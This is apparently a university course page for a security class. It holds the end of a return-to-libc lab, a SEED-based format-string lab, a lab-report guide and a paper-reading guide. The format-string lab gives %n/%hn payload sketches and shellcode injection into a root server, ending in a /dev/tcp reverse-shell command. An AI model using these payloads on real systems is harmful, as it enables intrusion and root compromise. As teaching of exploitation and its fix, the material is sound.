$ sudo ln -sf /bin/dash /bin/sh

If you re-run your Task 3 attack now, system() invokes /bin/sh → dash, dash notices it is running Set-UID and resets its effective UID to your real UID — so you get a shell, but not a root shell. Confirm this first; it is the behavior you are about to defeat.

The idea

dash (and bash) drop privilege unless they are started with the -p flag. system() never passes -p, so going through system() always drops privilege. The way around it is to skip system() entirely and call a libc function that runs /bin/bash -p directly. The exec family does exactly that — consider execv:

int execv(const char *pathname, char *const argv[]);

To run /bin/bash -p you must set up, in memory:

pathname  = address of the string "/bin/bash"
argv[0]   = address of "/bin/bash"
argv[1]   = address of "-p"
argv[2]   = NULL      (four bytes of zero)

and then return into execv with pathname as its first argument and the address of your argv[] array as its second.

You can get the addresses of the "/bin/bash" and "-p" strings the same way you got "/bin/sh" in Task 2 (export them as environment variables and locate them). The argv[] array — three pointers plus a terminating NULL — you build yourself inside your input.

The zero-bytes catch. argv[2] must be four zero bytes, but strcpy() stops at the first zero: anything you place after a 0x00000000 in badfile is not copied into bof’s buffer. The trick is that your entire input is also sitting in main()’s input[] buffer, copied there by fread() (which does not stop at zeros). main() prints the address of input[] for you, so build your argv[] array out in that buffer, where the terminating NULL is harmless, and point execv’s second argument at it.

Deliverable. First, evidence that the Task 3 attack yields a non-root shell once /bin/sh points back at dash (show id). Then your execv-based attack: how you laid out pathname, the argv[] array, and the three strings in memory; how you worked around the zero-byte problem; and a screenshot of the resulting root shell (id showing uid=0(root)). Explain in one paragraph why execv("/bin/bash", …) with -p keeps the privilege that system() loses.

Understanding check. The dash countermeasure drops privilege whenever it is launched Set-UID. You just showed it can be bypassed. Was the countermeasure useless, then — or did it raise the bar in some concrete way? State precisely what extra work it forced on the attacker.


Task 5: Return-Oriented Programming

Task 4 chained two ideas: run something other than system(). Generalize that to chaining many returns, and you have Return-Oriented Programming (ROP) — stitching together existing code fragments so that each one “returns” into the next.

You will do a small, self-contained case of this. retlib.c contains a function foo() that the program never calls. Craft your input so that when bof() returns, the program invokes foo() 10 times in a row, and only then hands you a root shell:

$ ./retlib
...
Function foo() is invoked 1 times
Function foo() is invoked 2 times
...
Function foo() is invoked 10 times
bash-5.0#            <-- root shell

How to think about it

In Task 3 you set up the stack so that bof returned into system(), and system() returned into exit(). Do the same thing, but with foo as the link in the chain: arrange the stack so bof returns into foo, foo returns into another foo, and so on ten times; the tenth foo returns into your Task-4 execv payload to give you the root shell.

Because foo() takes no arguments, each link in the chain is just a return address stacked on the previous one — you do not have to leave room for arguments between them. That is exactly what makes this case tractable by hand.

Deliverable. Your input construction (annotated: which four-byte slot holds what), and a screenshot showing foo() invoked ten times followed by a root shell. Explain how each foo “returns” into the next.

Understanding check. This was easy only because foo() takes no arguments. If foo() took one int argument, chaining ten calls would be markedly harder. Explain what goes wrong: after a no-argument foo returns, where does %esp point, and why does an argument sitting on the stack break the next link of the chain? (This is the problem that general ROP, with its “gadgets” ending in ret, exists to solve.)


Appendix: Understanding the Function-Call Mechanism

If the offsets in Task 3 feel like guesswork, work through this first. Compile a trivial program to assembly and watch what a call actually does to the stack.

/* foobar.c */
#include <stdio.h>

void foo(int x)
{
  printf("Hello world: %d\n", x);
}

int main()
{
  foo(1);
  return 0;
}
$ gcc -m32 -S foobar.c && cat foobar.s

The interesting part is what surrounds the call foo in main and the prologue of foo. Reading it top to bottom, a call proceeds like this:

  1. The caller pushes the arguments. main pushes 1 (the argument to foo) onto the stack.
  2. call foo pushes the address of the instruction after the call — the return address — and jumps into foo.
  3. foo’s prologue runs push %ebp (save the caller’s frame pointer) then mov %esp, %ebp (make %ebp point at foo’s new frame). From now on foo addresses its locals and arguments relative to %ebp.
  4. sub $N, %esp reserves space for foo’s locals.

Returning unwinds this in reverse:

  1. leave is shorthand for mov %ebp, %esp (discard the locals) followed by pop %ebp (restore the caller’s frame pointer). After this, %esp points at the saved return address.
  2. ret pops that return address and jumps to it.

Two facts from this are the whole basis of the attack:

  • The saved return address sits immediately above the saved %ebp, at %ebp + 4. Overwrite that slot and you control where the function returns.
  • ret blindly trusts whatever is in that slot. It does not care whether the target is the real caller, system(), or foo() — which is precisely what lets you redirect execution into libc.

Map this back onto retlib: the frame pointer the program prints is bof’s saved %ebp; the return-address slot you overwrite is 4 bytes above it; and the distance from buffer[] to that slot is the offset Y you needed in Task 3.


Cleaning up

Undo the global changes this lab made to your VM:

$ sudo ln -sf /bin/dash /bin/sh              # if it is still pointing at zsh
$ sudo sysctl -w kernel.randomize_va_space=2 # re-enable ASLR
$ unset MYSHELL                              # Task 2 (and any bash/-p vars)
$ ls -l /bin/sh                              # confirm it points at dash again

A root-owned Set-UID binary sitting in your home directory is itself a vulnerability. Delete the retlib binaries you built (including any renamed copies from Task 3, variation 2), or restore your pre-lab snapshot.

Submission

Submit a single PDF containing, for each task: the commands you ran, a screenshot or transcript of what you observed, and an explanation of why it happened. For the attack tasks, include your exploit.py / input construction and state clearly how you derived every address and offset. List the important code snippets followed by explanation — attaching code with no explanation will not receive credit.

See Submitting a Lab Report for the expected structure.

Lab 3: Format String and Reverse Shell

Adapted from the SEED Labs Format String Attack Lab (Ubuntu 20.04 edition) by Wenliang Du. See Attribution and License.

EnvironmentSEED Ubuntu 20.04 VM (setup) with Docker + docker-compose — this lab is x86 (32-bit) and needs the multilib toolchain
Fileslab3.tar.gz — the SEED Labsetup (Docker docker-compose.yml, server-code/, fmt-containers/, attack-code/), repackaged for this course. Can’t run Docker? Use the backup setup.
SubmissionOne PDF, structured as described in Submitting a Lab Report

Overview

printf() and its relatives take a format string — the "%d of %s\n" in printf("%d of %s\n", n, name) — that tells the function how many more arguments to expect and how to interpret each one. The function trusts that string completely: it reads one argument off the stack for every % directive it finds, whether or not the caller actually passed one.

That trust is safe only when the format string is a constant the programmer wrote. When a program instead lets user input become the format string — printf(user_input) instead of printf("%s", user_input) — the user, not the programmer, decides how many arguments printf reads and what it does with them. This is a format string vulnerability, and it is far more powerful than it first looks: with nothing but a carefully chosen string, an attacker can crash the program, read arbitrary memory, write to arbitrary memory, and ultimately inject and run their own code with the victim program’s privileges.

In this lab you are given a program with a format string vulnerability that runs with root privilege. You will exploit it in four escalating steps — crash it, read its memory, modify its memory, and finally inject shellcode to obtain a root shell — and then reason about the one-line fix that would have prevented all of it.

Topics covered:

  • Format string vulnerabilities and code injection
  • Stack layout and how printf walks its variadic arguments
  • The %x, %s, %n, and %hn directives, and the parameter field %k$
  • Shellcode and the reverse shell

Background reading

  • Chapter 6 of Computer & Internet Security: A Hands-on Approach, 2nd/3rd edition, by Wenliang Du — https://www.handsonsecurity.net
  • Chapter 9 of the same book, for the reverse shell used in Task 4
  • man 3 printf (read the description of the %n conversion and the m$ parameter field), man 1 nc, man 1 gdb
  • The Appendix: how printf walks the stack at the end of this lab — read it before Task 2 if the %x counting feels like guesswork.

A note on architecture (read this first)

Like the SEED lab, we do the whole exercise in 32-bit (x86): the addresses contain no zero bytes, which keeps the payloads simple, and the stack layout is easier to reason about. Every gcc command uses -m32. This has two consequences:

  • You need the 32-bit toolchain: sudo apt install gcc gcc-multilib. The SEED Ubuntu 20.04 VM already has it. We also compile -static, so no 32-bit shared libraries are required at run time.
  • The attack runs actual x86 code. On an Apple Silicon Mac an ARM VM cannot execute the 32-bit x86 binary this lab produces. Contact the instructor on Piazza with your SSH public key and NetID for a department VM. Do not attempt this lab on an ARM VM.

The optional Task 5 revisits the attack on a 64-bit build, where the zero bytes in addresses make things harder.

Host Ubuntu version. This lab is developed and tested on the SEED Ubuntu 20.04 VM, but it also builds and runs on newer hosts (Ubuntu 22.04 / 24.04), because the provided Makefile handles the two things that would otherwise break: it pins -std=gnu17 (so newer gcc, which defaults to C23, still accepts server.c’s old-style prototype), and it links every binary statically. The container image is Ubuntu 20.04 (glibc 2.31); a dynamically-linked binary built on a newer host asks the container for a glibc it does not have (GLIBC_2.34 not found) and the server exits at once — static linking bakes libc into the binary so it runs in the container whatever your host is. If you ever see that GLIBC error, you are building dynamically: run make clean && make.

Use Docker (and docker compose) for this lab

Unlike Labs 1 and 2, which ran a single binary on the VM, this lab runs the vulnerable program as a network server inside a Docker container, and you attack it over the network with netcat.

If you cannot get Docker working on your machine, a Docker-free fallback is documented in Appendix B: Running Without Docker at the end of this lab.

Before you begin

Note. This lab turns off address randomization and runs a root server that you will deliberately crash and hijack. Everything happens inside containers on your own VM.

Make sure Docker and docker-compose are installed (the SEED VM already has them):

$ docker --version && docker-compose --version

Download the lab source files and unpack them inside the VM:

mkdir -p ~/cs487/lab3 && cd ~/cs487/lab3
wget https://xiaoguang.wang/computer-security-labs/labs/files/lab3.tar.gz
tar xzf lab3.tar.gz
cd Labsetup && ls

You should see:

docker-compose.yml     # defines the two server containers and their network
server-code/           # format.c (the vulnerable program), server.c, Makefile
fmt-containers/        # the Dockerfile the images are built from
attack-code/           # build_string.py and exploit.py -- where you build payloads

Setting up the environment

1. Turn off Address Space Layout Randomization (ASLR)

Guessing addresses is a critical step of the attack, and ASLR randomizes the stack, heap, and library addresses on every run. Turn it off on the VM (the containers share the host kernel, so this one command covers them too):

$ sudo sysctl -w kernel.randomize_va_space=0

2. How the program is built, and the compilation flags

The containers run pre-compiled binaries, so the first step is to build them. The server-code/Makefile compiles the vulnerable program twice — 32-bit (format-32, used in Tasks 1–4) and 64-bit (format-64, used in the optional Task 5) — plus the server wrapper, in effect:

$ gcc -DBUF_SIZE=L -z execstack -static -m32 -o format-32 format.c   # 32-bit
$ gcc -DBUF_SIZE=L -z execstack           -o format-64 format.c   # 64-bit

Each flag matters:

  • -m32 — 32-bit x86 (see the architecture note above); -static makes it self-contained so the small container image needs no 32-bit shared libraries.
  • -z execstack — makes the stack executable. Task 4 injects code onto the stack and jumps to it; a non-executable stack would block that. Defeating a non-executable stack is the subject of Lab 2; here we leave it off to focus on the format string itself.
  • -DBUF_SIZE=L — sets the stack-layout knob L (the L = line in the Makefile). Your instructor may give you a specific value; it shifts every offset in your payloads, so use the value you are told and set it before building.

Why the instructor picks L. A different L changes the number of %x specifiers you need and every offset that follows, so a payload built for one L will not work for another. This deliberately makes last year’s solutions — and the ones posted online — useless, and forces you to derive the numbers yourself.

Build the binaries and copy them where the Dockerfile expects them:

$ cd server-code
$ make              # builds server, format-32, format-64 (set L first if told to)
$ make install      # copies the binaries into ../fmt-containers
$ cd ..

3. Build and start the containers

Now build the images and bring the containers up. SEED’s VM defines handy aliases — dcbuild, dcup, dcdown — for the three docker-compose commands:

$ dcbuild           # alias for: docker-compose build
$ dcup              # alias for: docker-compose up

Not on the SEED VM? These aliases are not built in — add them once. Append the following to your ~/.bashrc, then run source ~/.bashrc. (If your Docker uses the v2 plugin, replace docker-compose with docker compose.)

alias dcbuild='docker-compose build'
alias dcup='docker-compose up'
alias dcdown='docker-compose down'
alias dockps='docker ps --format "{{.ID}}  {{.Names}}"'
docksh() { docker exec -it "$1" /bin/bash; }

docker-compose.yml starts two containers on a private network:

ContainerIP addressBinaryUsed in
server-10.9.0.510.9.0.5format-32 (32-bit)Tasks 1–4
server-10.9.0.610.9.0.6format-64 (64-bit)Task 5 (optional)

Leave dcup running in its own terminal — this is where the server’s output appears, which matters for every task below. Open a second terminal for your attacks. Useful commands (also aliased on the SEED VM):

$ dockps                       # docker ps, short form: list running containers + IDs
$ docksh <id>                  # get a bash shell inside a container (first few ID chars)
$ dcdown                       # alias for: docker-compose down  (stop everything)

The server adds a little randomness. server.c seeds each container with a random-length environment variable when it starts, so the addresses you see differ from your classmates’ — but they stay fixed for the life of the container. As long as you do not dcdown, the numbers are stable and your payloads stay valid. (This is not ASLR; it is just per-student variation.)

4. The vulnerable program

Here is the essence of server-code/format.c (the real file also has a 64-bit branch for Task 5). It reads up to 1500 bytes from standard input into buf[] — which, on the server, is the TCP connection — prints the addresses you will need, then passes buf down through a dummy_function() (whose only purpose is to add BUF_SIZE bytes of stack spacing) into myprintf(), which hands your input straight to printf as the format string — the bug.

unsigned int  target = 0x11223344;
char         *secret = "A secret message\n";

void myprintf(char *msg)
{
    unsigned int *framep;
    asm("movl %%ebp, %0" : "=r"(framep));
    printf("Frame Pointer (inside myprintf):      0x%.8x\n", (unsigned int) framep);
    printf("The target variable's value (before): 0x%.8x\n", target);

    printf(msg);          //  <-- THE FORMAT-STRING VULNERABILITY

    printf("The target variable's value (after):  0x%.8x\n", target);
}

int main(int argc, char **argv)
{
    char buf[1500];

    printf("The input buffer's address:    0x%.8x\n", (unsigned int) buf);
    printf("The secret message's address:  0x%.8x\n", (unsigned int) secret);
    printf("The target variable's address: 0x%.8x\n", (unsigned int) &target);

    printf("Waiting for user input ......\n");
    int length = fread(buf, sizeof(char), 1500, stdin);
    printf("Received %d bytes.\n", length);

    dummy_function(buf);    // inserts a BUF_SIZE-byte frame, then calls myprintf(buf)
    printf("(^_^)(^_^)  Returned properly (^_^)(^_^)\n");
    return 1;
}

Note the three things the attacker gets for free: the address of buf[] (where your input lives), the address of the secret string on the heap (Task 2.B), and the address of the target variable (Task 3). The frame pointer (Task 4) is printed too.

The compiler already warned about this. When the images were built you saw warning: format not a string literal and no format arguments [-Wformat-security], pointing straight at printf(msg). That warning is the vulnerability; you will explain and fix it in the wrap-up.

5. A first, benign run

Send an ordinary string to the 32-bit server and watch the output appear in the dcup terminal (not in your attack terminal):

# In your attack terminal:
$ echo hello | nc 10.9.0.5 9090
                          # press Ctrl+C if it does not return on its own
# What appears on the server's console (the dcup terminal):
server-10.9.0.5 | Got a connection from 10.9.0.1
server-10.9.0.5 | Starting format
server-10.9.0.5 | The input buffer's address:    0xffffd2d0
server-10.9.0.5 | The secret message's address:  0x080b4008
server-10.9.0.5 | The target variable's address: 0x080e5068
server-10.9.0.5 | Waiting for user input ......
server-10.9.0.5 | Received 6 bytes.
server-10.9.0.5 | Frame Pointer (inside myprintf):      0xffffd1f8
server-10.9.0.5 | The target variable's value (before): 0x11223344
server-10.9.0.5 | hello
server-10.9.0.5 | The target variable's value (after):  0x11223344
server-10.9.0.5 | (^_^)(^_^)  Returned properly (^_^)(^_^)

(Your addresses will differ from these — remember the per-container randomness — but they are stable until you dcdown.) The Returned properly line and the unchanged target value are your signal that nothing went wrong; in the tasks below, their absence or change on the server console is how you know your payload worked. Because most payloads are long and contain non-printable bytes, build them with the provided Python scripts in attack-code/ and pipe the resulting file to nc:

$ cd attack-code
$ ./build_string.py            # writes the payload to ./badfile
$ cat badfile | nc 10.9.0.5 9090

Task 1: Crashing the Program

Your first task is the simplest damage: provide an input that makes the program crash instead of returning properly. On the server console you will know it crashed because you do not see the (^_^)(^_^) Returned properly line after your connection — the format child died. (The server process itself keeps running and accepting new connections, because each request is handled in a forked child; only the child crashes.)

Think about what printf does with a format string full of directives when the caller passed no matching arguments. Each %x makes it read another 4-byte word off the stack and print it as a number — harmless, if odd. But %s makes it treat that word as a pointer and dereference it, reading a string from wherever that word points. Feed it enough %s and sooner or later one of those stack words is not a valid pointer, and the read faults.

$ echo '%s%s%s%s%s%s%s%s%s%s%s%s' | nc 10.9.0.5 9090
              # (standalone backup: echo '%s%s...' | ./format-32)

Watch the dcup terminal: a benign run ends with Returned properly, a crashing run does not.

Deliverable. The input you used and a screenshot/transcript of the server console showing the program crashed (no Returned properly). Explain why your input crashes it — which directive causes the fault, and what printf is trying to do at the moment it dies. If %s alone did not crash it on the first try, explain why you might need several.

Understanding check. A string of %n directives will also crash the program, but for a different reason than %s. What is that reason? (You will use %n on purpose in Task 3 — here it crashes because of where it tries to write.)


Task 2: Printing Out the Server Program’s Memory

Now make the program leak its own memory. The leaked data prints on the server’s console (the dcup terminal), where a true remote attacker could not see it — so this is not a practical attack by itself. The point is the technique: finding where your own input sits among the arguments printf walks. That offset is the single most important number in the whole lab; every later task depends on it.

Task 2.A: Stack data — find the magic number

When printf starts consuming %x directives, it walks up the stack from just above its own arguments. A few words up, it reaches the memory that holds your input string itself (buf[]). If you can count how many %x it takes to get there, then the next directive is reading bytes you control.

Put a recognizable 4-byte marker at the very front of your input, follow it with a run of %x separated by dots, and count: when one of the printed values comes back as your marker, the number of %x up to and including it is the magic number k.

# build_string.py (sketch)
content = bytearray(0x0 for i in range(1500))
content[0:4] = (0x44434241).to_bytes(4, byteorder='little')   # "ABCD" marker
s = ".%x" * 30
content[4:4+len(s.encode())] = s.encode('latin-1')
$ ./build_string.py                     # writes ./badfile
$ cat badfile | nc 10.9.0.5 9090        # (standalone backup: cat badfile | ./format-32)

On the server console, read across the printed %x values until you see ...41424344... (your marker). Count the %x positions to it. You can confirm with the parameter field: %k$x should print the marker directly.

Deliverable. Your input, the output showing your marker appearing in the %x dump, and the value of k — the number of %x needed to reach the start of your own input. Explain what those first k−1 values you skipped over actually are (whose stack words is printf printing before it reaches your buffer?).

Task 2.B: Heap data — read the secret string

The program stores a secret string on the heap and prints its address for you. Use the vulnerability to print the contents of that string. The idea: place the address of the secret at the front of your input (little-endian, in binary), use your magic number k to walk printf’s argument pointer to that address, and then a %s dereferences it and prints the string.

secret_addr = 0x080b4008                                  # from the program's printout
content[0:4] = (secret_addr).to_bytes(4, byteorder='little')
# then reach slot k with (k-1) %x, and finish with %s   -- or just use %k$s

Deliverable. Your payload and a screenshot showing the secret message printed. Explain how the address at the front of your buffer becomes the argument that %s dereferences, and why the byte order of that address matters.

Understanding check. The leak prints on the server’s console, where a real remote attacker cannot see it. Why is the technique still essential even when the attacker cannot read the leak? (Hint: Tasks 3 and 4 use the same k to write, not read.)


Task 3: Modifying the Server Program’s Memory

Reading memory is serious; writing it is worse. The %n directive does not print anything — it writes the number of characters output so far into the address given by the corresponding argument. Point that argument at the target variable and you can change its value. target starts at 0x11223344; the program prints its value before and after, so you can see your write land.

The mechanism is exactly Task 2.B, but with %n in place of %s: put target’s address at the front, walk to it with your magic number k, and write with %n.

Task 3.A: Change target to any different value

Success is simply making the “after” value differ from 0x11223344.

target_addr = 0x080e5068                                  # from the program's printout
content[0:4] = (target_addr).to_bytes(4, byteorder='little')
# reach slot k, then %n   (the value written is however many chars printed so far)

Deliverable. Your payload and the before/after output showing target changed. State what value it changed to and explain where that number came from.

Task 3.B: Change target to exactly 0x5000

%n writes the count of characters printed so far. To land a specific value you control that count — usually with a width field such as %.20000x, which prints a number padded to 20000 characters. 0x5000 is 20480 in decimal, so arrange for exactly 20480 characters to have been printed at the moment %n fires (remember to subtract the bytes you already printed before the width directive).

Deliverable. Your payload and the output showing target is now 0x00005000. Show the arithmetic: how you made the running character count reach exactly 20480.

Task 3.C: Change target to 0xAABBCCDD

0xAABBCCDD is 2,863,311,581 in decimal — a single %n would have to print nearly 3 billion characters, which takes far too long. The fix is to write two bytes at a time with %hn (or one byte with %hhn): write the low half-word and the high half-word to target and target+2 separately, so the largest count you ever print is about 65535 characters.

Because %n writes a running, monotonically increasing count, order the two writes so the required count only goes up: write whichever half-word is the smaller number first, then print the difference in characters before writing the larger one.

content[0:4] = (target_addr    ).to_bytes(4, byteorder='little')   # for the low half
content[4:8] = (target_addr + 2).to_bytes(4, byteorder='little')   # for the high half
# then two %hn writes, with width fields chosen so the counts hit 0xCCDD and 0xAABB

Deliverable. Your payload and the output showing target is now 0xaabbccdd. Explain why %n would have been impractical here, how %hn fixes it, and why the order in which you write the two half-words matters.

Understanding check. You placed the addresses to write to at the front of your input and the value came from the character count. Explain, in one or two sentences, why the attacker controls both the address written to and the value written — this “write-anything-anywhere” primitive is what makes Task 4 possible.


Task 4: Inject Malicious Code into the Server Program

Now the crown jewel. Instead of writing to target, you will use the same write-anything-anywhere primitive to overwrite a return address, redirecting execution into shellcode you placed in the buffer. Because the program runs as root, the shell you get is a root shell.

The plan

  1. Put shellcode in the buffer. exploit.py already places a 32-bit shellcode near the end of your 1500-byte payload. Its start address is buf_address + start_offset — and buf_address is printed by the program.
  2. Find the return address slot. When myprintf returns, the CPU jumps to the address saved just above myprintf’s saved %ebp. The program prints the frame pointer; the return-address slot is at frame pointer + 4. (Work through the Appendix if this is unfamiliar.)
  3. Overwrite that slot with the shellcode’s start address, using the two-%hn technique from Task 3.C — low half-word to ret_addr, high half-word to ret_addr + 2. When myprintf returns, it “returns” into your shellcode.

The stack when printf runs inside myprintf

        higher addresses
   +--------------------------+
   |   buf[1500]  (your input |  <- your shellcode sits near the top of this;
   |   lives here, in main)   |     its address = buf_address + start_offset
   +--------------------------+
   |        ....              |
   +--------------------------+
   |   return address of      |  <- overwrite THIS (at frame pointer + 4)
   |   myprintf()             |     with the shellcode's start address
   +--------------------------+
   |   saved %ebp of myprintf |  <- frame pointer points here
   +--------------------------+
   |        ....              |
   +--------------------------+
   |   format string arg ---> |  <- printf starts walking its args from here;
   |   (points into buf)      |     your magic number k counts up to buf
        lower addresses

Demonstrate code execution

The shellcode in attack-code/exploit.py runs /bin/bash -c "<command>". It ships with a harmless demo command (/bin/ls -l; echo '===== Success! ======'). Fill in the format-string portion of exploit.py to overwrite the return address, then fire the payload at the server:

$ ./exploit.py                          # build badfile
$ cat badfile | nc 10.9.0.5 9090        # (standalone backup: cat badfile | sudo ./format-32)

Watch the server console. If your overwrite landed, you will see the ls listing and ===== Success! ====== — output produced by your injected code, running as root inside the server. If you instead see Returned properly, your overwrite missed; a segfault means your target address or count is off. Recheck k, the frame pointer, and your two half-word counts.

Get a root reverse shell

A fixed command is not control — and on the real server its output prints on the server console, where you cannot see it. For an interactive root shell you drive, switch the shellcode’s command string to a reverse shell that connects back to a listener you run. In exploit.py, change the command string, keeping the * in the same column by padding with spaces (its position is hard-coded in the shellcode):

"/bin/bash -i > /dev/tcp/10.9.0.1/7070 0<&1 2>&1           *"

10.9.0.1 is your VM’s address on the container network (the gateway the containers see); 7070 is a spare port for the shell, kept separate from the server’s 9090. Start the listener on the VM, then fire the exploit:

# Terminal 1 (on the VM) — the attacker's listener
$ nc -lnv 7070

# Terminal 2 (on the VM) — trigger the vulnerable root server
$ ./exploit.py
$ cat badfile | nc 10.9.0.5 9090

The listener should receive a shell. Confirm it is root, and that you are inside the container (its hostname is the container ID):

# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
<container id>

Why a reverse shell here? The server child’s standard input is the TCP connection that carried your payload; a plain interactive /bin/bash would fight over that same socket and give you no usable prompt. The reverse shell sidesteps this by opening a fresh connection (/dev/tcp/...) for the shell’s own input and output. (In the standalone backup, stdin is the exhausted badfile, so a plain shell would read EOF and exit immediately — the reverse shell fixes that too; point it at 127.0.0.1.)

Deliverable. (1) Evidence of code execution with the demo command. (2) Your reverse-shell attack: how you laid out the shellcode, how you derived the return-address slot from the frame pointer, and how you split the shellcode’s start address across two %hn writes. (3) A screenshot of the root reverse shell with id showing uid=0(root). Mark on the stack diagram where your shellcode is stored, with its concrete address.

Understanding check. You overwrote a return address with an address on the stack, and the CPU happily executed instructions there. Which one compilation flag, if removed, would have stopped this exact attack — and which Lab 2 technique would an attacker then reach for instead?


Task 5 (Optional, 1 bonus point): Attacking the 64-bit Program

The second container, server-10.9.0.6 (10.9.0.6), is already running the 64-bit build (format-64) — it came up with dcup, so there is nothing new to compile. Point your attack at 10.9.0.6 and mount the same code-injection attack to get a root shell, this time selecting the 64-bit shellcode in exploit.py (shellcode = shellcode_64):

$ cat badfile | nc 10.9.0.6 9090

The new obstacle is zero bytes in addresses. On x86-64, valid addresses run only up to 0x00007FFFFFFFFFFF, so every 8-byte address has zero bytes in its high end. You cannot drop such an address into the middle of your format string, because printf stops parsing at the first 0x00. You must decide where in the payload the zero-containing addresses can safely go, and use the parameter field (%k$...) to reach them.

The parameter field makes this manageable: %k$x reads the k-th argument directly, and you can move the pointer back and forth freely:

printf("%3$.20x%6$n%2$.10x\n", 1, 2, 3, 4, 5, &var);   // writes 20 into var

Deliverable. Your 64-bit payload and a screenshot of the resulting root shell. Explain specifically how you handled the zero-byte problem — where you placed the addresses in the payload and how you reached them — and how the 64-bit stack layout differed from the 32-bit case.


Wrap-up: Fixing the Vulnerability

Go back to the compiler warning you saw while building the images:

warning: format not a string literal and no format arguments [-Wformat-security]

In server-code/format.c, change the vulnerable line in myprintf from printf(msg); to printf("%s", msg);, then rebuild and restart the container so the fix takes effect:

$ cd server-code && make && make install && cd ..
$ dcbuild && dcup

Confirm both that the warning is gone and that one of your earlier attacks (say, Task 3.A) no longer works. (Standalone backup: just make and re-run ./format-32.)

Deliverable. State in your own words what the warning was telling you, show the one-line fix, and give evidence that the fix defeats your attack (the warning is gone and target no longer changes). Explain why printf("%s", msg) is safe when printf(msg) was not — what does the user no longer control?


Cleaning up

Stop and remove the containers, and undo the global change this lab made to your VM:

$ dcdown                                       # stop and remove the containers
$ sudo sysctl -w kernel.randomize_va_space=2   # re-enable ASLR

Kill any leftover nc listeners. You can reclaim disk space from the built images with docker image rm seed-image-fmt-server-1 seed-image-fmt-server-2 once you are done. (In the standalone backup, just delete the format-32/format-64 binaries and any badfile payloads you built.)

Submission

Submit a single PDF containing, for each task: the commands you ran, a screenshot or transcript of what you observed, and an explanation of why it happened. For the attack tasks, include your build_string.py / exploit.py and state clearly how you derived the magic number k, every address, and every character count. List the important code snippets followed by explanation — attaching code with no explanation will not receive credit.

See Submitting a Lab Report for the expected structure.


Appendix A: How printf Walks the Stack

If the %x counting in Task 2 feels like guesswork, this is the mechanism behind it.

A variadic function like printf receives its first argument (the format string) in the usual place, but it has no idea how many arguments follow — the format string is the only thing that tells it. Every time printf scans a conversion directive (%x, %s, %d, %n, …), it grabs “the next argument” by advancing a pointer through the memory that sits just above the format-string argument on the stack, and interprets whatever is there according to the directive:

  • %x — read the next 4-byte word, print it as hex. (Just reads; harmless.)
  • %s — read the next 4-byte word, treat it as a pointer, and print the string it points to. (A bad pointer faults — this is Task 1.)
  • %n — read the next 4-byte word, treat it as a pointer, and write the number of characters printed so far to that address. (This is the write primitive — Tasks 3 and 4.)
  • %hn / %hhn — like %n but write only 2 bytes / 1 byte. (Task 3.C.)
  • %k$... — skip straight to the k-th argument instead of walking one at a time. (Task 5.)

The attacker’s leverage comes from two facts working together:

  1. printf keeps reading arguments for as long as the format string tells it to, even past the arguments the caller actually pushed — so it walks off into other stack memory.
  2. A few words up that stack, it reaches buf[] — the attacker’s own input. So the attacker can plant an address in the buffer and then use %s/%n to make printf treat that attacker-chosen value as the pointer to read from or write to.

The magic number k from Task 2.A is simply how many arguments printf must walk before its pointer reaches the start of your buffer. Once you know k, every other task is a variation: reach slot k, then read (%s) or write (%n/%hn) through an address you planted there.


Appendix B: Running Without Docker (Backup Setup)

If you cannot get Docker working, download lab3-standalone.tar.gz instead. It contains the same format.c and the same attack-code/ scripts, with a trimmed Makefile that builds the vulnerable program so you can run it directly, feeding the payload on standard input instead of over the network:

wget https://xiaoguang.wang/computer-security-labs/labs/files/lab3-standalone.tar.gz
tar xzf lab3-standalone.tar.gz && cd Labsetup
make                                   # builds format-32 and format-64 (set L first)
echo hello | ./format-32               # the benign run, output right in your terminal

Everything else in this lab is identical — the payloads, the addresses logic, and the reasoning. The only differences: the program’s output appears in your own terminal (not on a separate server console), and wherever a task says ... | nc 10.9.0.5 9090, you instead run ... | ./format-32. For Task 4 you run the program as root to stand in for the root server — cat badfile | sudo ./format-32 — and point the reverse shell at 127.0.0.1. These substitutions are noted again where they matter.

Submitting a Lab Report

Every CS487 lab is submitted as a single PDF.

Required structure

CS487 Lab N — <Your Name>, <Your NetID>
  1. Environment
     - VM image and version, hypervisor, anything non-standard about your setup
  2. Task 1: <task title>
     - Commands run
     - Observation (screenshot or transcript)
     - Explanation
  3. Task 2: ...
  ...
  N. Reflection (optional, but read)
     - What surprised you? What is still unclear?

Use the task titles exactly as they appear in the lab. Graders read many reports; matching headings makes it obvious that nothing is missing.

Screenshots

  • Capture the whole terminal window, including the prompt. The prompt shows which user you are, and for these labs “which user you are” is usually the entire point.
  • Crop to the relevant region, but never crop out the command itself.
  • Make the text legible at 100% zoom. A screenshot nobody can read is not evidence.

Code snippets

  • Include the code you wrote or changed, not the entire file, unless the file is short.
  • Paste code as text in a monospace font, not as a screenshot, so it can be copied and checked.
  • Reference the line you are talking about: “the setuid(getuid()) call on line 21 revokes the privilege, but the descriptor opened on line 12 survives.”

Explanations

The single most common way to lose points is to describe the output instead of explaining it.

Weak: “After exporting LD_PRELOAD and running the Set-UID program, it printed I am not sleeping! when run by root but not by a normal user.”

Strong: “The dynamic linker ignores LD_PRELOAD when the process is Set-UID and the real and effective UIDs differ, because honoring it would let any user inject code into a privileged process. When root runs the program the real and effective UIDs are both 0, so there is no privilege boundary to protect and the variable is honored — which is why the override only appears in that one case.”

Honesty

If a task did not work, say so, and describe what you tried. A report that says “Task 6 did not produce a root shell; here is what I observed and here is my best hypothesis” earns substantial partial credit. A report that claims a result the screenshots do not show earns none, and is treated as an integrity issue.

Paper Reading Report Guide

The goal of the paper reading report is to demonstrate that you understand the paper’s problem, key insight, technical approach, and evidence, rather than simply summarize its content.

Your report should normally be 1–2 pages. Answer the following questions concisely and in your own words.

1. Problem and Motivation

What problem does the paper address? Why is this problem important or difficult?

Explain the problem in your own words rather than copying or closely paraphrasing the abstract or introduction.

2. Key Idea

What is the paper’s main idea or insight?

Explain the key idea in 2–4 sentences, as if you were explaining the paper to a classmate who has not read it.

3. Technical Approach

How does the proposed system or technique work?

Identify the major components or steps and explain how they work together. Focus on the ideas necessary to understand the paper rather than low-level implementation details.

4. Concrete Example

Give one concrete example that illustrates how the proposed technique works.

You may use an example from the paper or construct your own. Be specific enough to demonstrate that you understand the mechanism.

5. Evaluation and Evidence

Choose one important experiment, figure, or table from the paper and explain:

  • What question is the experiment trying to answer?
  • What is being compared or measured?
  • What does the result show?
  • How does this result support, or fail to fully support, the paper’s claims?

6. Limitations

Identify one important limitation, assumption, or weakness of the work.

Explain why it matters. Avoid generic comments such as “more experiments are needed.”

7. Your Idea

